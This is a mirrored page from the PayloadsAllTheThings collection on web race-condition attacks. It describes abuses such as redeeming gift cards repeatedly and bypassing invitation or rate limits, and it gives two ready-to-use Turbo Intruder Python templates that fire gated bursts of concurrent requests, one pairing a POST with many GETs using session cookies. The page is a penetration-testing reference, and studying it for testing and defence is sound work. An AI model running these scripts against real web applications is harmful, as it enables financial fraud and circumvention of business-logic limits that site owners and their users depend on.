mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
4 KiB
4 KiB
Race Condition
Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.
Summary
Tools
Labs
Limit-overrun
TODO
Examples:
- Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4
- Race conditions can be used to bypass invitation limit - @franjkovic
- Register multiple users using one invitation - @franjkovic
Rate-limit bypass
TODO
Examples:
Turbo Intruder
Example 1
- Send request to turbo intruder
- Use this python code as a payload of the turbo intruder
def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=30, pipeline=False ) for i in range(30): engine.queue(target.req, i) engine.queue(target.req, target.baseInput, gate='race1') engine.start(timeout=5) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req)
- Now set the external HTTP header x-request: %s - ⚠️ This is needed by the turbo intruder
- Click "Attack"
Example 2
This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
request1 = '''
POST /target-URI-1 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
parameterName=parameterValue
'''
request2 = '''
GET /target-URI-2 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
'''
engine.queue(request1, gate='race1')
for i in range(30):
engine.queue(request2, gate='race1')
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
References
- DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle
- Turbo Intruder: Embracing the billion-request attack - James Kettle - 25 January 2019
- Race Condition Bug In Web App: A Use Case - Mandeep Jadon - Apr 24, 2018
- Race conditions on the web - Josip Franjkovic - July 12th, 2016
- New techniques and tools for web race conditions - Emma Stocks - 10 August 2023